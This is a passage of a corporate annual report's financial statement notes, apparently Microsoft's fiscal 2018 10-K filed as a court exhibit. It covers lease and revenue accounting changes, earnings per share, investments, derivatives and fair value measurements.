ROU assets represent our right to use an underlying asset for the lease term and lease liabilities represent our obligation to make lease payments arising from the lease. Operating lease ROU assets and liabilities are recognized at commencement date based on the present value of lease payments over the lease term. As most of our leases do not provide an implicit rate, we use our incremental borrowing rate based on the information available at commencement date in determining the present value of lease payments. We use the implicit rate when readily determinable. The operating lease ROU asset also includes any lease payments made and excludes lease incentives. Our lease terms may include options to extend or terminate the lease when it is reasonably certain that we will exercise that option. Lease expense for lease payments is recognized on a straight-line basis over the lease term.

We have lease agreements with lease and non-lease components, which are generally accounted for separately. For certain equipment leases, such as vehicles, we account for the lease and non-lease components as a single lease component. Additionally, for certain equipment leases, we apply a portfolio approach to effectively account for the operating lease ROU assets and liabilities.

### Goodwill

Goodwill is tested for impairment at the reporting unit level (operating segment or one level below an operating segment) on an annual basis (May 1 for us) and between annual tests if an event occurs or circumstances change that would more likely than not reduce the fair value of a reporting unit below its carrying value.

### Intangible Assets

All of our intangible assets are subject to amortization and are amortized using the straight-line method over their estimated period of benefit, ranging from one to 20 years. We evaluate the recoverability of intangible assets periodically by taking into account events or circumstances that may warrant revised estimates of useful lives or that indicate the asset may be impaired.

### Recent Tax Legislation

On December 22, 2017, the Tax Cuts and Jobs Act ("TCJA") was enacted into law, which significantly changes existing U.S. tax law and includes numerous provisions that affect our business. Refer to Note 13 – Income Taxes for further discussion.

As a result of the TCJA, we have recast certain prior period income tax liabilities in our consolidated balance sheets to conform to the current period presentation. Previously reported balances were impacted as follows:

| (In millions) | | As Previously Reported | | As Adjusted |
|---|---|---|---|---|
| **Balance Sheets** | | | | **June 30, 2017** |
| Long-term income taxes | $ | 0 | $ | 13,485 |
| Other long-term liabilities | | 17,034 | | 3,549 |

These adjustments had no impact in our consolidated income statements or net cash from or used in operating, financing, or investing in our consolidated cash flows statements.

## Recent Accounting Guidance

### Recently Adopted Accounting Guidance

#### Comprehensive Income – Reclassification of Certain Tax Effects

In February 2018, the Financial Accounting Standards Board ("FASB") issued new guidance to allow a reclassification from accumulated other comprehensive income ("AOCI") to retained earnings for stranded tax effects resulting from the TCJA. In the second quarter of fiscal year 2018, we remeasured our deferred taxes related to unrealized gains on our investment balances using the reduced tax rate. As required by GAAP, we recognized the net tax benefit in the provision for income taxes in our consolidated income statements, even though the deferred taxes were initially recognized in AOCI, which resulted in stranded tax effects. We elected to early adopt the standard effective April 1, 2018 and reclassified a $42 million net tax benefit from AOCI to retained earnings in our consolidated balance sheets. Adoption of the standard had no impact to our consolidated income statements or cash flows statements.

#### Leases

In February 2016, the FASB issued a new standard related to leases to increase transparency and comparability among organizations by requiring the recognition of ROU assets and lease liabilities on the balance sheet. Most prominent among the changes in the standard is the recognition of ROU assets and lease liabilities by lessees for those leases classified as operating leases. Under the standard, disclosures are required to meet the objective of enabling users of financial statements to assess the amount, timing, and uncertainty of cash flows arising from leases. We are also required to recognize and measure leases existing at, or entered into after, the beginning of the earliest comparative period presented using a modified retrospective approach, with certain practical expedients available.

We elected to early adopt the standard effective July 1, 2017 concurrent with our adoption of the new standard related to revenue recognition. We elected the available practical expedients and implemented internal controls and key system functionality to enable the preparation of financial information on adoption.

The standard had a material impact in our consolidated balance sheets, but did not have an impact in our consolidated income statements. The most significant impact was the recognition of ROU assets and lease liabilities for operating leases, while our accounting for finance leases remained substantially unchanged. Adoption of the standard required us to restate certain previously reported results, including the recognition of additional ROU assets and lease liabilities for operating leases. Refer to Impacts to Previously Reported Results below for the impact of adoption of the standard in our consolidated financial statements.

#### Revenue from Contracts with Customers

In May 2014, the FASB issued a new standard related to revenue recognition. Under the standard, revenue is recognized when a customer obtains control of promised goods or services in an amount that reflects the consideration the entity expects to receive in exchange for those goods or services. In addition, the standard requires disclosure of the nature, amount, timing, and uncertainty of revenue and cash flows arising from contracts with customers.

We elected to early adopt the standard effective July 1, 2017, using the full retrospective method, which required us to restate each prior reporting period presented. We implemented internal controls and key system functionality to enable the preparation of financial information on adoption.

The most significant impact of the standard relates to our accounting for software license revenue. Specifically, for Windows 10, we recognize revenue predominantly at the time of billing and delivery rather than ratably over the life of the related device. For certain multi-year commercial software subscriptions that include both distinct software licenses and SA, we recognize license revenue at the time of contract execution rather than over the subscription period. Due to the complexity of certain of our commercial license subscription contracts, the actual revenue recognition treatment required under the standard depends on contract-specific terms and in some instances may vary from recognition at the time of billing. Revenue recognition related to our hardware, cloud offerings (such as Office 365), LinkedIn, and professional services remains substantially unchanged.

Adoption of the standard using the full retrospective method required us to restate certain previously reported results, including the recognition of additional revenue and an increase in the provision for income taxes, primarily due to the net change in Windows 10 revenue recognition. In addition, adoption of the standard resulted in an increase in accounts receivable and other current and long-term assets, driven by unbilled receivables from upfront recognition of revenue for certain multi-year commercial software subscriptions that include both distinct software licenses and SA; a reduction of unearned revenue, driven by the upfront recognition of license revenue from Windows 10 and certain multi-year commercial software subscriptions; and an increase in deferred income taxes, driven by the upfront recognition of revenue. Refer to Impacts to Previously Reported Results below for the impact of adoption of the standard in our consolidated financial statements.

*Impacts to Previously Reported Results*

Adoption of the standards related to revenue recognition and leases impacted our previously reported results as follows:

| (In millions, except per share amounts) | | As Previously Reported | | New Revenue Standard Adjustment | | As Restated |
|---|---|---|---|---|---|---|
| **Income Statements** | | | | | | |
| **Year Ended June 30, 2017** | | | | | | |
| Revenue | $ | 89,950 | $ | 6,621 | $ | 96,571 |
| Provision for income taxes | | 1,945 | | 2,467 | | 4,412 |
| Net income | | 21,204 | | 4,285 | | 25,489 |
| Diluted earnings per share | | 2.71 | | 0.54 | | 3.25 |
| **Year Ended June 30, 2016** | | | | | | |
| Revenue | $ | 85,320 | $ | 5,834 | $ | 91,154 |
| Provision for income taxes | | 2,953 | | 2,147 | | 5,100 |
| Net income | | 16,798 | | 3,741 | | 20,539 |
| Diluted earnings per share | | 2.10 | | 0.46 | | 2.56 |

| (In millions) | | As Previously Reported | | New Revenue Standard Adjustment | | New Lease Standard Adjustment | | As Restated |
|---|---|---|---|---|---|---|---|---|
| **Balance Sheets** | | | | | | | | |
| **June 30, 2017** | | | | | | | | |
| Accounts receivable, net of allowance for doubtful accounts | $ | 19,792 | $ | 2,639 | $ | 0 | $ | 22,431 |
| Operating lease right-of-use assets | | 0 | | 0 | | 6,555 | | 6,555 |
| Other current and long-term assets | | 11,147 | | 32 | | 0 | | 11,179 |
| Unearned revenue | | 44,479 | | (17,823) | | 0 | | 26,656 |
| Deferred income taxes | | 531 | | 5,203 | | 0 | | 5,734 |
| Operating lease liabilities | | 0 | | 0 | | 5,372 | | 5,372 |
| Other current and long-term liabilities | | 23,464 | | (26) | | 1,183 | | 24,621 |
| Stockholders' equity | | 72,394 | | 15,317 | | 0 | | 87,711 |

Adoption of the standards related to revenue recognition and leases had no impact to cash from or used in operating, financing, or investing in our consolidated cash flows statements.

### Recent Accounting Guidance Not Yet Adopted

*Financial Instruments – Targeted Improvements to Accounting for Hedging Activities*

In August 2017, the FASB issued new guidance related to accounting for hedging activities. This guidance expands strategies that qualify for hedge accounting, changes how many hedging relationships are presented in the financial statements, and simplifies the application of hedge accounting in certain situations. The standard will be effective for us beginning July 1, 2019, with early adoption permitted for any interim or annual period before the effective date. Adoption of the standard will be applied using a modified retrospective approach through a cumulative-effect adjustment to retained earnings as of the effective date. We are currently evaluating the impact of this standard in our consolidated financial statements, including accounting policies, processes, and systems.

*Income Taxes – Intra-Entity Asset Transfers*

In October 2016, the FASB issued new guidance requiring an entity to recognize the income tax consequences of an intra-entity transfer of an asset other than inventory when the transfer occurs, rather than when the asset has been sold to an outside party. This guidance is effective for us beginning July 1, 2018, with early adoption permitted beginning July 1, 2017. We plan to adopt the guidance effective July 1, 2018. Adoption of the guidance will be applied using a modified retrospective approach through a cumulative-effect adjustment to retained earnings as of the effective date. We currently expect a net cumulative-effect adjustment of approximately $550 million, which will reverse the deferral of income tax consequences from past intra-entity transfers involving assets other than inventory and new deferred tax assets for amounts not recognized under current GAAP, partially offset by a U.S. deferred tax liability related to global intangible low-taxed income ("GILTI"). Adoption of the standard is expected to result in an increase in long-term deferred tax assets of $2.8 billion, an increase in long-term deferred tax liabilities of $2.1 billion, and a reduction to other current assets of $150 million. As a result of the TCJA, we are continuing to evaluate the impact of this standard in our consolidated financial statements, including accounting policies, processes, and systems.

*Financial Instruments – Credit Losses*

In June 2016, the FASB issued a new standard to replace the incurred loss impairment methodology under current GAAP with a methodology that reflects expected credit losses and requires consideration of a broader range of reasonable and supportable information to inform credit loss estimates. We will be required to use a forward-looking expected credit loss model for accounts receivables, loans, and other financial instruments. Credit losses relating to available-for-sale debt securities will also be recorded through an allowance for credit losses rather than as a reduction in the amortized cost basis of the securities. The standard will be effective for us beginning July 1, 2020, with early adoption permitted beginning July 1, 2019. Adoption of the standard will be applied using a modified retrospective approach through a cumulative-effect adjustment to retained earnings as of the effective date to align our credit loss methodology with the new standard. We are currently evaluating the impact of this standard in our consolidated financial statements, including accounting policies, processes, and systems.

*Financial Instruments – Recognition, Measurement, Presentation, and Disclosure*

In January 2016, the FASB issued a new standard related to certain aspects of recognition, measurement, presentation, and disclosure of financial instruments. Most prominent among the changes in the standard is the requirement for changes in the fair value of our equity investments, with certain exceptions, to be recognized through net income rather than OCI. Under the standard, equity investments that do not have a readily determinable fair value are eligible for the measurement alternative. Using the measurement alternative, investments without readily determinable fair values will be valued at cost, with adjustments for changes in price or impairments reflected through net income.

The standard will be effective for us beginning July 1, 2018. Adoption of the standard will be applied using a modified retrospective approach through a cumulative-effect adjustment from AOCI to retained earnings as of the effective date. A cumulative-effect adjustment will capture any previously held unrealized gains and losses held in AOCI related to our equity investments carried at fair value as well as the impact of recording the fair value of certain equity investments carried at cost. In preparation for adoption of this standard, we have implemented internal controls to align with the new standard and have concluded that we will elect the measurement alternative for equity investments that do not have readily determinable fair values.

The impact in our consolidated balance sheets upon adoption will not be material. Adoption of the standard will have no impact to cash from or used in operating, financing or investing in our consolidated cash flows statements.

## NOTE 2 — EARNINGS PER SHARE

Basic earnings per share ("EPS") is computed based on the weighted average number of shares of common stock outstanding during the period. Diluted EPS is computed based on the weighted average number of shares of common stock plus the effect of dilutive potential common shares outstanding during the period using the treasury stock method. Dilutive potential common shares include outstanding stock options and stock awards.

The components of basic and diluted EPS were as follows:

**(In millions, except earnings per share)**

| Year Ended June 30, | 2018 | 2017 | 2016 |
|---|---|---|---|
| Net income available for common shareholders (A) | $ 16,571 | $ 25,489 | $ 20,539 |
| Weighted average outstanding shares of common stock (B) | 7,700 | 7,746 | 7,925 |
| Dilutive effect of stock-based awards | 94 | 86 | 88 |
| Common stock and common stock equivalents (C) | 7,794 | 7,832 | 8,013 |
| **Earnings Per Share** | | | |
| Basic (A/B) | $ 2.15 | $ 3.29 | $ 2.59 |
| Diluted (A/C) | $ 2.13 | $ 3.25 | $ 2.56 |

Anti-dilutive stock-based awards excluded from the calculations of diluted EPS were immaterial during the periods presented.

## NOTE 3 — OTHER INCOME (EXPENSE), NET

The components of other income (expense), net were as follows:

**(In millions)**

| Year Ended June 30, | 2018 | 2017 | 2016 |
|---|---|---|---|
| Dividends and interest income | $ 2,214 | $ 1,387 | $ 903 |
| Interest expense | (2,733) | (2,222) | (1,243) |
| Net recognized gains on investments | 2,399 | 2,583 | 668 |
| Net losses on derivatives | (187) | (510) | (443) |
| Net losses on foreign currency remeasurements | (218) | (111) | (129) |
| Other, net | (59) | (251) | (195) |
| Total | $ 1,416 | $ 876 | $ (439) |

Following are details of net recognized gains (losses) on investments during the periods reported:

**(In millions)**

| Year Ended June 30, | 2018 | 2017 | 2016 |
|---|---|---|---|
| Other-than-temporary impairments of investments | $ (47) | $ (55) | $ (322) |
| Realized gains from sales of available-for-sale securities | 3,478 | 3,064 | 1,376 |
| Realized losses from sales of available-for-sale securities | (1,032) | (426) | (386) |
| Total | $ 2,399 | $ 2,583 | $ 668 |

Case 0:20-cv-60416-XXXX   Document 1-35   Entered on FLSB Docket 02/26/2020   Page 67 of
726

PART II
Item 8

<u>NOTE 4 — INVESTMENTS</u>

**Investment Components**

The components of investments, including associated derivatives, were as follows:

| (In millions) | Cost Basis | Unrealized Gains | Unrealized Losses | Recorded Basis | Cash and Cash Equivalents | Short-term Investments | Equity and Other Investments |
|---|---|---|---|---|---|---|---|
| **June 30, 2018** | | | | | | | |
| Cash | $ 3,942 | $ 0 | $ 0 | $ 3,942 | $ 3,942 | $ 0 | $ 0 |
| Mutual funds | 246 | 0 | 0 | 246 | 246 | 0 | 0 |
| Commercial paper | 2,513 | 0 | 0 | 2,513 | 2,215 | 298 | 0 |
| Certificates of deposit | 2,058 | 0 | 0 | 2,058 | 1,865 | 193 | 0 |
| U.S. government and agency securities | 109,862 | 62 | (1,167) | 108,757 | 3,678 | 105,079 | 0 |
| Foreign government bonds | 5,182 | 1 | (10) | 5,173 | 0 | 5,173 | 0 |
| Mortgage- and asset-backed securities | 3,868 | 4 | (13) | 3,859 | 0 | 3,859 | 0 |
| Corporate notes and bonds | 6,947 | 21 | (56) | 6,912 | 0 | 6,912 | 0 |
| Municipal securities | 271 | 37 | (1) | 307 | 0 | 307 | 0 |
| Common and preferred stock | 1,220 | 95 | (10) | 1,305 | 0 | 0 | 1,305 |
| Other investments | 558 | 0 | 0 | 558 | 0 | 1 | 557 |
| Total | $ 136,667 | $ 220 | $ (1,257) | $ 135,630 | $ 11,946 | $ 121,822 | $ 1,862 |

| (In millions) | Cost Basis | Unrealized Gains | Unrealized Losses | Recorded Basis | Cash and Cash Equivalents | Short-term Investments | Equity and Other Investments |
|---|---|---|---|---|---|---|---|
| **June 30, 2017** | | | | | | | |
| Cash | $ 3,624 | $ 0 | $ 0 | $ 3,624 | $ 3,624 | $ 0 | $ 0 |
| Mutual funds | 1,478 | 0 | 0 | 1,478 | 1,478 | 0 | 0 |
| Commercial paper | 319 | 0 | 0 | 319 | 69 | 250 | 0 |
| Certificates of deposit | 1,358 | 0 | 0 | 1,358 | 972 | 386 | 0 |
| U.S. government and agency securities | 112,119 | 85 | (360) | 111,844 | 16 | 111,828 | 0 |
| Foreign government bonds | 5,276 | 2 | (13) | 5,265 | 1,504 | 3,761 | 0 |
| Mortgage- and asset-backed securities | 3,921 | 14 | (4) | 3,931 | 0 | 3,931 | 0 |
| Corporate notes and bonds | 4,786 | 61 | (12) | 4,835 | 0 | 4,835 | 0 |
| Municipal securities | 284 | 43 | 0 | 327 | 0 | 327 | 0 |
| Common and preferred stock | 2,472 | 3,062 | (34) | 5,500 | 0 | 0 | 5,500 |
| Other investments | 523 | 0 | 0 | 523 | 0 | 0 | 523 |
| Total | $ 136,160 | $ 3,267 | $ (423) | $ 139,004 | $ 7,663 | $ 125,318 | $ 6,023 |

As of June 30, 2018 and 2017, the recorded bases of common and preferred stock that are restricted for more than one year or are not publicly traded were $999 million and $1.1 billion, respectively. These investments are carried at cost and are reviewed quarterly for indicators of other-than-temporary impairment. It is not practicable for us to reliably estimate the fair value of these investments.

As of June 30, 2018 and 2017, collateral received under agreements for loaned securities was $1.8 billion and $3.7 billion, respectively, and primarily comprised U.S. government and agency securities.

**Unrealized Losses on Investments**

Investments with continuous unrealized losses for less than 12 months and 12 months or greater and their related fair values were as follows:

| (In millions) | Less than 12 Months | | 12 Months or Greater | | | |
|---|---|---|---|---|---|---|
| | Fair Value | Unrealized Losses | Fair Value | Unrealized Losses | Total Fair Value | Total Unrealized Losses |
| **June 30, 2018** | | | | | | |
| U.S. government and agency securities | $ 82,352 | $ (1,064) | $ 4,459 | $ (103) | $ 86,811 | $ (1,167) |
| Foreign government bonds | 3,457 | (7) | 13 | (3) | 3,470 | (10) |
| Mortgage- and asset-backed securities | 2,072 | (9) | 96 | (4) | 2,168 | (13) |
| Corporate notes and bonds | 3,111 | (43) | 301 | (13) | 3,412 | (56) |
| Municipal securities | 45 | (1) | 0 | 0 | 45 | (1) |
| Common and preferred stock | 75 | (6) | 8 | (4) | 83 | (10) |
| Total | $ 91,112 | $ (1,130) | $ 4,877 | $ (127) | $ 95,989 | $ (1,257) |

| (In millions) | Less than 12 Months | | 12 Months or Greater | | | |
|---|---|---|---|---|---|---|
| | Fair Value | Unrealized Losses | Fair Value | Unrealized Losses | Total Fair Value | Total Unrealized Losses |
| **June 30, 2017** | | | | | | |
| U.S. government and agency securities | $ 87,558 | $ (348) | $ 371 | $ (12) | $ 87,929 | $ (360) |
| Foreign government bonds | 4,006 | (2) | 23 | (11) | 4,029 | (13) |
| Mortgage- and asset-backed securities | 1,068 | (3) | 198 | (1) | 1,266 | (4) |
| Corporate notes and bonds | 669 | (8) | 177 | (4) | 846 | (12) |
| Common and preferred stock | 69 | (6) | 148 | (28) | 217 | (34) |
| Total | $ 93,370 | $ (367) | $ 917 | $ (56) | $ 94,287 | $ (423) |

Unrealized losses from fixed-income securities are primarily attributable to changes in interest rates. Unrealized losses from domestic and international equities are due to market price movements. Management does not believe any remaining unrealized losses represent other-than-temporary impairments based on our evaluation of available evidence.

**Debt Investment Maturities**

| (In millions) | | Cost Basis | | Estimated Fair Value |
|---|---|---|---|---|
| **June 30, 2018** | | | | |
| Due in one year or less | $ | 31,590 | $ | 31,451 |
| Due after one year through five years | | 76,422 | | 75,810 |
| Due after five years through 10 years | | 21,765 | | 21,396 |
| Due after 10 years | | 924 | | 922 |
| Total | $ | 130,701 | $ | 129,579 |

## NOTE 5 — DERIVATIVES

We use derivative instruments to manage risks related to foreign currencies, equity prices, interest rates, and credit; to enhance investment returns; and to facilitate portfolio diversification. Our objectives for holding derivatives include reducing, eliminating, and efficiently managing the economic impact of these exposures as effectively as possible.

Our derivative programs include strategies that both qualify and do not qualify for hedge accounting treatment. All notional amounts presented below are measured in U.S. dollar equivalents.

### Foreign Currency

Certain forecasted transactions, assets, and liabilities are exposed to foreign currency risk. We monitor our foreign currency exposures daily to maximize the economic effectiveness of our foreign currency hedge positions. Option and forward contracts are used to hedge a portion of forecasted international revenue for up to three years in the future and are designated as cash flow hedging instruments. Principal currencies hedged include the euro, Japanese yen, British pound, Canadian dollar, and Australian dollar. As of June 30, 2018 and 2017, the total notional amounts of these foreign exchange contracts sold were $6.1 billion and $8.9 billion, respectively.

Foreign currency risks related to certain non-U.S. dollar denominated securities are hedged using foreign exchange forward contracts that are designated as fair value hedging instruments. As of June 30, 2018 and 2017, the total notional amounts of these foreign exchange contracts sold were $5.0 billion and $5.1 billion, respectively.

Certain options and forwards not designated as hedging instruments are also used to manage the variability in foreign exchange rates on certain balance sheet amounts and to manage other foreign currency exposures. As of June 30, 2018, the total notional amounts of these foreign exchange contracts purchased and sold were $9.4 billion and $13.4 billion, respectively. As of June 30, 2017, the total notional amounts of these foreign exchange contracts purchased and sold were $8.8 billion and $10.6 billion, respectively.

### Equity

Securities held in our equity and other investments portfolio are subject to market price risk. Market price risk is managed relative to broad-based global and domestic equity indices using certain convertible preferred investments, options, futures, and swap contracts not designated as hedging instruments. From time to time, to hedge our price risk, we may use and designate equity derivatives as hedging instruments, including puts, calls, swaps, and forwards. As of June 30, 2018, the total notional amounts of equity contracts purchased and sold for managing market price risk were $49 million and $5 million, respectively. As of June 30, 2017, the total notional amounts of equity contracts purchased and sold for managing market price risk were $1.9 billion and $2.4 billion, respectively, of which $1.6 billion and $1.8 billion, respectively, were designated as hedging instruments.

**Interest Rate**

Securities held in our fixed-income portfolio are subject to different interest rate risks based on their maturities. We manage the average maturity of our fixed-income portfolio to achieve economic returns that correlate to certain broad-based fixed-income indices using exchange-traded option and futures contracts, and over-the-counter swap and option contracts, none of which are designated as hedging instruments. As of June 30, 2018, the total notional amounts of fixed-interest rate contracts purchased and sold were $306 million and $390 million, respectively. As of June 30, 2017, the total notional amounts of fixed-interest rate contracts purchased and sold were $233 million and $352 million, respectively.

In addition, we use "To Be Announced" forward purchase commitments of mortgage-backed assets to gain exposure to agency mortgage-backed securities. These meet the definition of a derivative instrument in cases where physical delivery of the assets is not taken at the earliest available delivery date. As of June 30, 2018 and 2017, the total notional derivative amounts of mortgage contracts purchased were $568 million and $567 million, respectively.

**Credit**

Our fixed-income portfolio is diversified and consists primarily of investment-grade securities. We use credit default swap contracts, not designated as hedging instruments, to manage credit exposures relative to broad-based indices and to facilitate portfolio diversification. We use credit default swaps as they are a low-cost method of managing exposure to individual credit risks or groups of credit risks. As of June 30, 2018, the total notional amounts of credit contracts purchased and sold were $4 million and $82 million, respectively. As of June 30, 2017, the total notional amounts of credit contracts purchased and sold were $267 million and $63 million, respectively.

**Credit-Risk-Related Contingent Features**

Certain of our counterparty agreements for derivative instruments contain provisions that require our issued and outstanding long-term unsecured debt to maintain an investment grade credit rating and require us to maintain minimum liquidity of $1.0 billion. To the extent we fail to meet these requirements, we will be required to post collateral, similar to the standard convention related to over-the-counter derivatives. As of June 30, 2018, our long-term unsecured debt rating was AAA, and cash investments were in excess of $1.0 billion. As a result, no collateral was required to be posted.

**Fair Values of Derivative Instruments**

The following table presents the fair values of derivative instruments designated as hedging instruments ("designated hedge derivatives") and not designated as hedging instruments ("non-designated hedge derivatives"). The fair values exclude the impact of netting derivative assets and liabilities when a legally enforceable master netting agreement exists and fair value adjustments related to our own credit risk and counterparty credit risk:

| | | | | Assets | | Liabilities |
|---|---|---|---|---|---|---|
| (In millions) | Short-term Investments | Other Current Assets | Equity and Other Investments | Other Long-term Assets | Other Current Liabilities | Other Long-term Liabilities |
| **June 30, 2018** | | | | | | |
| **Non-designated Hedge Derivatives** | | | | | | |
| Foreign exchange contracts | $ 10 | $ 221 | $ 0 | $ 25 | $ (193) | $ (4) |
| Equity contracts | 2 | 0 | 0 | 0 | (7) | 0 |
| Interest rate contracts | 11 | 0 | 0 | 0 | (2) | 0 |
| Credit contracts | 0 | 0 | 0 | 0 | (1) | 0 |
| Total | $ 23 | $ 221 | $ 0 | $ 25 | $ (203) | $ (4) |
| **Designated Hedge Derivatives** | | | | | | |
| Foreign exchange contracts | $ 95 | $ 174 | $ 0 | $ 0 | $ 0 | $ 0 |
| Equity contracts | 0 | 0 | 0 | 0 | 0 | 0 |
| Total | $ 95 | $ 174 | $ 0 | $ 0 | $ 0 | $ 0 |
| Total gross amounts of derivatives | $ 118 | $ 395 | $ 0 | $ 25 | $ (203) | $ (4) |
| Gross derivatives either offset or subject to an enforceable master netting agreement | $ 113 | $ 395 | $ 0 | $ 25 | $ (203) | $ (4) |
| Gross amounts of derivatives offset on the balance sheet | (14) | (135) | 0 | (3) | 150 | 3 |
| Net amounts presented on the balance sheet | 99 | 260 | 0 | 22 | (53) | (1) |
| Gross amounts of derivatives not offset on the balance sheet | 0 | 0 | 0 | 0 | 0 | 0 |
| Cash collateral received | 0 | 0 | 0 | 0 | (235) | 0 |
| Net amount | $ 99 | $ 260 | $ 0 | $ 22 | $ (288) | $ (1) |

|  |  | Assets |  |  | Liabilities |  |
|---|---|---|---|---|---|---|
| (In millions) | Short-term Investments | Other Current Assets | Equity and Other Investments | Other Long-term Assets | Other Current Liabilities | Other Long-term Liabilities |
| **June 30, 2017** |  |  |  |  |  |  |
| **Non-designated Hedge Derivatives** |  |  |  |  |  |  |
| Foreign exchange contracts | $ 9 | $ 203 | $ 0 | $ 6 | $ (134) | $ (8) |
| Equity contracts | 3 | 0 | 0 | 0 | (6) | 0 |
| Interest rate contracts | 3 | 0 | 0 | 0 | (7) | 0 |
| Credit contracts | 5 | 0 | 0 | 0 | (1) | 0 |
| Total | $ 20 | $ 203 | $ 0 | $ 6 | $ (148) | $ (8) |
| **Designated Hedge Derivatives** |  |  |  |  |  |  |
| Foreign exchange contracts | $ 80 | $ 133 | $ 0 | $ 0 | $ (3) | $ 0 |
| Equity contracts | 0 | 0 | 67 | 0 | (186) | 0 |
| Total | $ 80 | $ 133 | $ 67 | $ 0 | $ (189) | $ 0 |
| Total gross amounts of derivatives | $ 100 | $ 336 | $ 67 | $ 6 | $ (337) | $ (8) |
| Gross derivatives either offset or subject to an enforceable master netting agreement | $ 100 | $ 336 | $ 67 | $ 6 | $ (334) | $ (8) |
| Gross amounts of derivatives offset on the balance sheet | (20) | (132) | (67) | (8) | 221 | 7 |
| Net amounts presented on the balance sheet | 80 | 204 | 0 | (2) | (113) | (1) |
| Gross amounts of derivatives not offset on the balance sheet | 0 | 0 | 0 | 0 | 0 | 0 |
| Cash collateral received | 0 | 0 | 0 | 0 | (228) | 0 |
| Net amount | $ 80 | $ 204 | $ 0 | $ (2) | $ (341) | $ (1) |

Refer to Note 4 – Investments and Note 6 – Fair Value Measurements for further information.

**Fair Value Hedge Gains (Losses)**

We recognized in other income (expense), net the following gains (losses) on contracts designated as fair value hedges and their related hedged items:

(In millions)

| Year Ended June 30, | 2018 | 2017 | 2016 |
|---|---|---|---|
| **Foreign Exchange Contracts** |  |  |  |
| Derivatives | $ 25 | $ 441 | $ (797) |
| Hedged items | 78 | (386) | 838 |
| Total amount of ineffectiveness | $ 103 | $ 55 | $ 41 |
| **Equity Contracts** |  |  |  |
| Derivatives | $ (324) | $ (74) | $ (76) |
| Hedged items | 324 | 74 | 76 |
| Total amount of ineffectiveness | $ 0 | $ 0 | $ 0 |
| Amount of equity contracts excluded from effectiveness assessment | $ 80 | $ (80) | $ (10) |

**Cash Flow Hedge Gains (Losses)**

We recognized the following gains (losses) on foreign exchange contracts designated as cash flow hedges:

(In millions)

| Year Ended June 30, | 2018 | 2017 | 2016 |
|---|---|---|---|
| **Effective Portion** | | | |
| Gains recognized in other comprehensive income (net of tax of **$11**, $4, and $24) | **$ 219** | $ 328 | $ 351 |
| Gains reclassified from accumulated other comprehensive income (loss) into revenue | **185** | 555 | 625 |
| **Amount Excluded from Effectiveness Assessment and Ineffective Portion** | | | |
| Losses recognized in other income (expense), net | **(255)** | (389) | (354) |

We estimate that $179 million of net derivative gains included in AOCI as of June 30, 2018 will be reclassified into earnings within the following 12 months. No significant amounts of gains (losses) were reclassified from AOCI into earnings as a result of forecasted transactions that failed to occur during fiscal year 2018.

**Non-designated Derivative Gains (Losses)**

Gains (losses) from changes in fair values of derivatives that are not designated as hedges are primarily recognized in other income (expense), net. These amounts are shown in the table below, with the exception of gains (losses) on derivatives presented in income statement line items other than other income (expense), net, which were immaterial for the periods presented.

(In millions)

| Year Ended June 30, | 2018 | 2017 | 2016 |
|---|---|---|---|
| Foreign exchange contracts | **$ (33)** | $ (117) | $ (55) |
| Equity contracts | **(87)** | (114) | (21) |
| Interest rate contracts | **(15)** | 14 | 10 |
| Credit contracts | **(2)** | 5 | (1) |
| Other contracts | **0** | (22) | (87) |
| Total | **$ (137)** | $ (234) | $ (154) |

<u>NOTE 6 — FAIR VALUE MEASUREMENTS</u>

**Financial Assets and Liabilities Measured at Fair Value on a Recurring Basis**

The following tables present the fair value of our financial instruments that are measured at fair value on a recurring basis:

| (In millions) | Level 1 | Level 2 | Level 3 | Gross Fair Value | Netting[a] | Net Fair Value |
|---|---|---|---|---|---|---|
| **June 30, 2018** | | | | | | |
| **Assets** | | | | | | |
| Mutual funds | $ 246 | $ 0 | $ 0 | $ 246 | $ 0 | $ 246 |
| Commercial paper | 0 | 2,513 | 0 | 2,513 | 0 | 2,513 |
| Certificates of deposit | 0 | 2,058 | 0 | 2,058 | 0 | 2,058 |
| U.S. government and agency securities | 107,015 | 1,742 | 0 | 108,757 | 0 | 108,757 |
| Foreign government bonds | 22 | 5,054 | 0 | 5,076 | 0 | 5,076 |
| Mortgage- and asset-backed securities | 0 | 3,855 | 0 | 3,855 | 0 | 3,855 |
| Corporate notes and bonds | 0 | 6,894 | 15 | 6,909 | 0 | 6,909 |
| Municipal securities | 0 | 307 | 0 | 307 | 0 | 307 |
| Common and preferred stock | 287 | 0 | 18 | 305 | 0 | 305 |
| Derivatives | 1 | 535 | 2 | 538 | (152) | 386 |
| Total | $ 107,571 | $ 22,958 | $ 35 | $ 130,564 | $ (152) | $ 130,412 |
| **Liabilities** | | | | | | |
| Derivatives and other | $ 1 | $ 206 | $ 0 | $ 207 | $ (153) | $ 54 |

| (In millions) | Level 1 | Level 2 | Level 3 | Gross Fair Value | Netting[a] | Net Fair Value |
|---|---|---|---|---|---|---|
| **June 30, 2017** | | | | | | |
| **Assets** | | | | | | |
| Mutual funds | $ 1,478 | $ 0 | $ 0 | $ 1,478 | $ 0 | $ 1,478 |
| Commercial paper | 0 | 319 | 0 | 319 | 0 | 319 |
| Certificates of deposit | 0 | 1,358 | 0 | 1,358 | 0 | 1,358 |
| U.S. government and agency securities | 109,228 | 2,616 | 0 | 111,844 | 0 | 111,844 |
| Foreign government bonds | 0 | 5,187 | 0 | 5,187 | 0 | 5,187 |
| Mortgage- and asset-backed securities | 0 | 3,934 | 0 | 3,934 | 0 | 3,934 |
| Corporate notes and bonds | 0 | 4,829 | 1 | 4,830 | 0 | 4,830 |
| Municipal securities | 0 | 327 | 0 | 327 | 0 | 327 |
| Common and preferred stock | 2,414 | 1,994 | 18 | 4,426 | 0 | 4,426 |
| Derivatives | 1 | 508 | 0 | 509 | (227) | 282 |
| Total | $ 113,121 | $ 21,072 | $ 19 | $ 134,212 | $ (227) | $ 133,985 |
| **Liabilities** | | | | | | |
| Derivatives and other | $ 0 | $ 345 | $ 39 | $ 384 | $ (228) | $ 156 |

(a)  *These amounts represent the impact of netting derivative assets and derivative liabilities when a legally enforceable master netting agreement exists and fair value adjustments related to our own credit risk and counterparty credit risk.*

The changes in our Level 3 financial instruments that are measured at fair value on a recurring basis were immaterial during the periods presented.

The following table reconciles the total "Net Fair Value" of assets above to the balance sheet presentation of these same assets in Note 4 – Investments.

(In millions)

| June 30, | 2018 | 2017 |
|---|---|---|
| Net fair value of assets measured at fair value on a recurring basis | $ 130,412 | $ 133,985 |
| Cash | 3,942 | 3,624 |
| Common and preferred stock measured at fair value on a nonrecurring basis | 999 | 1,073 |
| Other investments measured at fair value on a nonrecurring basis | 557 | 523 |
